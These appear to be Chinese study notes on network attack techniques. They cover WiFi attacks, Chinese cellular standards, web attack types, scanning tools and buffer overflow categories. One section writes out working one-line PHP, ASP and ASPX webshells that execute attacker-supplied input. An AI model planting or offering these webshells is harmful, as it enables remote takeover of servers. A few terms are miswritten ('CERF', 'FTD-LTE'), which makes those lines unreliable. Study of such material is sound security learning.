网络对抗笔记
无线技术
wifi攻击方式:Krack 协议wpa2,发展wep、wpa、wpa2
无线网络主动扫描直接探针:IMEI,SSID,手机号,MAC
中国4G制式标准
联通TD-LTE,FTD-LTE
电信TD-LTE,FTD-LTE
移动TD-LTE
中国3G制式标准
联通WCDMA
电信CDMA2000
移动TD-SCDMA
中国2G制式标准
联通GSM
电信CDMA
移动GSM
Web攻击技术
类别:XSS(跨站脚本攻击)、CERF(跨站伪造攻击)、SQL注入
工具:Nmap:扫描端口,Nessus:扫描系统漏洞,APPscan:Web漏洞扫描,Nikto:网页服务器扫描器,Whatweb:网站指纹识别,X-scan:网络综合扫描,Netcat:网络测试工具(后门)
一句话木马:
php的一句话木马: <?php @eval($_POST['pass']);?>
asp的一句话是: <%eval request ("pass")%>
aspx的一句话是: <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
XSS攻击类型:反射型XSS、存储型XSS、DOM型XSS
缓冲区溢出:
栈溢出:注意gets(name);与字符串的长度
堆溢出:注意memset函数
格式化串溢出:注意printf函数
BSS溢出:变量与变量之间为连续存放
XSS
CSRF